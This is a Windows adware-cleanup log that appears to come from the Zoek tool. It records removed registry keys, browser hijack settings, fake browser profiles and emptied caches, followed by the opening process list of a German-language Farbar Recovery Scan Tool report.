HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully 
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully 
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet 
Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully HKEY_CLASSES_ROOT\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully ==== Deleting CLSID Registry Values ====================== HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully 
HKEY_USERS\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully HKEY_USERS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully ==== Deleting Services ====================== ==== FireFox Fix ====================== Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js: user_pref("browser.startup.homepage", "hxxp://www.google.de/"); user_pref("browser.search.useDBForOrder", false); Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js: user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js: user_pref("browser.startup.homepage", 
"https://www.malwarebytes.org/restorebrowser//?ts=AHEpBnAsAHQpAk..&v=20160301&uid=A460F8ADD5C00C48BC17A830416D08D5&ptid=sqr1&mode=ffseng"); user_pref("browser.search.defaultenginename", "yessearches"); user_pref("browser.search.selectedEngine", "yessearches"); user_pref("browser.search.useDBForOrder", false); Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js: Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\prefs.js: user_pref("browser.search.useDBForOrder", false); Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\prefs.js: user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 user.js not found ---- Lines webget removed from prefs.js ---- user_pref("extensions.webget.asul", "1400531425838"); user_pref("extensions.webget.aul", "1400530028243"); user_pref("extensions.webget.irl", true); user_pref("extensions.webget.is", "isgi1whDE"); user_pref("extensions.webget.ug", "19739959-F219-4984-864D-0CB6FC4D1F41"); ---- Lines {21EAF666-26B3-4a3c-ABD0-CA2F5A326744} removed from prefs.js ---- user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.extensionFirstRun", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.lastExtensionVersion", "2.0.0.440"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_install_time", "19-05-2014"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_name", "V-bates"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_version", "2.0.0.440"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_temp_version", "2.0.0.440|||8641400531305203"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_toolbarID", "dc73c26d8e6b4a77a3e092975238ebb7"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdefaultsearch_2.0.0.440", false); 
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdnscatch_2.0.0.440", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.sethomepage_2.0.0.440", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setndsvalue_2.0.0.440", false); ---- Lines searches removed from prefs.js ---- user_pref("browser.urlbar.suggest.searches", true); ---- FireFox user.js and prefs.js backups ---- prefs__1343_.backup ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F user.js not found ---- FireFox user.js and prefs.js backups ---- prefs__1343_.backup ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default user.js not found ---- Lines webget removed from prefs.js ---- user_pref("extensions.webget.asul", "1400531425838"); user_pref("extensions.webget.aul", "1400530028243"); user_pref("extensions.webget.irl", true); user_pref("extensions.webget.is", "isgi1whDE"); user_pref("extensions.webget.ug", "19739959-F219-4984-864D-0CB6FC4D1F41"); ---- Lines {21EAF666-26B3-4a3c-ABD0-CA2F5A326744} removed from prefs.js ---- user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.extensionFirstRun", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.lastExtensionVersion", "2.0.0.440"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_install_time", "19-05-2014"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_name", "V-bates"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_version", "2.0.0.440"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_temp_version", "2.0.0.440|||8641400531305203"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_toolbarID", "dc73c26d8e6b4a77a3e092975238ebb7"); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdefaultsearch_2.0.0.440", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdnscatch_2.0.0.440", false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.sethomepage_2.0.0.440", 
false); user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setndsvalue_2.0.0.440", false); ---- Lines browser.startup.page removed from prefs.js ---- user_pref("browser.startup.page", 1); ---- FireFox user.js and prefs.js backups ---- prefs__1343_.backup ==== Deleting Files \ Folders ====================== C:\PROGRA~3\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C} not found C:\PROGRA~2\Adblock for Gmail deleted C:\PROGRA~2\Color Icons for Gmail deleted C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Search.lnk deleted C:\Users\Public\Documents\dmp deleted C:\WINDOWS\SysNative\config\systemprofile\Searches deleted C:\WINDOWS\SysWow64\searchplugins deleted C:\WINDOWS\SysWow64\Extensions deleted C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\jetpack deleted C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\jetpack deleted C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\jetpack deleted C:\Users\Denny\Desktop\Continue Last version Installation.lnk deleted "C:\windows\Installer\1504d.msi" deleted "C:\WINDOWS\Installer\1b6bc9bd.msi" deleted ==== Firefox Start and Search pages ====================== ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); ==== Firefox Extensions ====================== ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F - Undetermined - C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\extensions.ini AppDir: C:\Program Files (x86)\Mozilla Firefox - Undetermined - 
%AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi ==== Firefox Plugins ====================== ==== Fake Chromium Profiles Check ====================== Fake profile C:\Users\Administrator\AppData\Local\Google\Chrome deleted Fake profile C:\Users\Administrator\AppData\Local\Google\Chrome SxS deleted Fake profile C:\Users\Administrator\AppData\Local\Comodo\Dragon deleted Fake profile C:\Users\Denny\AppData\Local\Google\Chrome deleted Fake profile C:\Users\Gast\AppData\Local\Torch deleted Fake profile C:\Users\Gast\AppData\Local\Google\Chrome deleted Fake profile C:\Users\Gast\AppData\Local\Google\Chrome SxS deleted Fake profile C:\Users\Gast\AppData\Local\Comodo\Dragon deleted Fake profile C:\Users\HomeGroupUser$\AppData\Local\Torch deleted Fake profile C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome deleted Fake profile C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome SxS deleted Fake profile C:\Users\HomeGroupUser$\AppData\Local\Comodo\Dragon deleted ==== Chromium Look ====================== Chrome Hotword Shared Module - Denny\AppData\Local\Chromium\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg ==== Set IE to Default ====================== Old Values: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="hxxp://www.google.de/" "Search Page"="hxxp://www.google.com" "Default_Page_URL"="hxxp://www.google.com" "Search Bar"="hxxp://www.google.com" "Use Search Asst"="yes" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Default_Search_URL"="hxxp://www.google.com" "Default_Page_URL"="hxxp://www.google.com" "Search Page"="hxxp://www.google.com" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main] "Default_Search_URL"="hxxp://www.google.com" "Default_Page_URL"="hxxp://www.google.com" "Search Page"="hxxp://www.google.com" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl] "Default"="hxxp://www.google.com" 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl] "Default"="hxxp://www.google.com" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl] "Default"="hxxp://www.google.com" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs] "Tabs"="res://ieframe.dll/tabswelcome.htm" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs] "Tabs"="res://ieframe.dll/tabswelcome.htm" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search] "Default_Search_URL"="hxxp://www.google.com" New Values: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Search Bar"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" "Start Page"="hxxp://www.google.de/" "Use Search Asst"="no" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main] "Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" "Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl] "(Default)"="hxxp://search.msn.com/results.asp?q=%s" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl] "(Default)"="hxxp://search.msn.com/results.asp?q=%s" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl] "(Default)"="hxxp://search.msn.com/results.asp?q=%s" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs] "Tabs"="about:newtab" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs] "Tabs"="about:newtab" 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search] "Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896" ==== All HKLM and HKCU SearchScopes ====================== HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 HKLM\SearchScopes\{362BB042-C718-4C1E-A525-564285A105FD} - hxxp://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS HKLM\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 HKLM\SearchScopes\{DC91FAFB-6CEA-49E5-BB74-9CEE75D09B77} - hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKLM\Wow6432Node\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 HKCU\SearchScopes "DefaultScope"="{8CB5941F-AEB6-4B8B-956E-95EBED73E3FE}" HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - hxxp://www.google.com/search?q={searchTerms} HKCU\SearchScopes\{8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} - https://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} ==== Deleting Registry Keys ====================== HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\203E62EEA6789D84098513925E9B9999 deleted successfully HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F274703B9DB704042955ECD6A611693A deleted successfully HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE26E302-876A-48D9-9058-3129E5B99999} deleted successfully 
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B307472F-7BD9-4040-9255-CE6D6A1196A3} deleted successfully HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\203E62EEA6789D84098513925E9B9999 deleted successfully HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\F274703B9DB704042955ECD6A611693A deleted successfully ==== Empty IE Cache ====================== C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\M8QJFTEX will be deleted at reboot C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\P0OXFN6R will be deleted at reboot C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\TS9KI79H will be deleted at reboot ==== Empty FireFox Cache ====================== C:\Users\Denny\AppData\Local\Mozilla\Firefox\Profiles\41A66E7E5EE1\cache2 emptied successfully ==== Empty Chrome Cache ====================== C:\Users\Denny\AppData\Local\Chromium\User Data\Default\Cache emptied successfully ==== Empty All Flash Cache ====================== Flash Cache Emptied Successfully ==== Empty All Java Cache ====================== Java Cache cleared successfully ==== C:\zoek_backup content ====================== C:\zoek_backup (files=85 folders=25 21801290 bytes) ==== Empty Temp Folders ====================== C:\Users\Administrator.Schneider\AppData\Local\Temp emptied successfully C:\Users\Default\AppData\Local\Temp emptied successfully C:\Users\Default User\AppData\Local\Temp emptied successfully C:\Users\Denny\AppData\Local\Temp will be emptied at reboot 
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully C:\WINDOWS\Temp will be emptied at reboot ==== After Reboot ====================== ==== Empty Temp Folders ====================== C:\WINDOWS\Temp successfully emptied C:\Users\Denny\AppData\Local\Temp successfully emptied ==== Empty Recycle Bin ====================== C:\$RECYCLE.BIN successfully emptied ==== Deleting Files / Folders ====================== "C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\M8QJFTEX" not found "C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\P0OXFN6R" not found "C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\TS9KI79H" not found ==== EOF on 30.03.2016 at 13:54:38,34 ====================== Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Denny (Administrator) auf SCHNEIDER (30-03-2016 14:42:55)
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator)
Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

